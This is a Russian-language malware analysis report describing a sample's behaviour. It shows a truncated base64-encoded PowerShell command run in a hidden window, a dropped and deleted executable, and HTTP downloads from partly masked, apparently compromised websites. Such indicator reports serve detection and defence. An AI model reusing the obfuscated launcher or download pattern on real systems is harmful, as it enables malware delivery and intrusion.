Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAFYARgBLAEwAdQB6AGcAPQAnAEoAUQBQAEkASgBiAHYAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAYABVAFIAYABpAHQAWQBQAFIATwBUAG8AQwBgAE8ATAAiAC...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\903.exe
Удаляет следующие файлы
- %HOMEPATH%\903.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://el####gelondon.com/wp-admin/QS/
- http://em##tg.com/guestbook/uQ4qC339/
- http://el##ent.com/assets/ReH6966/
- http://el##ent.com/cgi-sys/suspendedpage.cgi
- http://el###akina.net/ww4w/WnRLv/
- http://el#####obusiness.com/takeout.eliteseobusiness.com/GYa538680/
UDP
- DNS ASK el####gelondon.com
- DNS ASK em##tg.com
- DNS ASK el##ent.com
- DNS ASK el###akina.net
- DNS ASK el#####obusiness.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAFYARgBLAEwAdQB6AGcAPQAnAEoAUQBQAEkASgBiAHYAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAYABVAFIAYABpAHQAWQBQAFIATwBUAG8AQwBgAE8ATAAiAC...' (со скрытым окном)
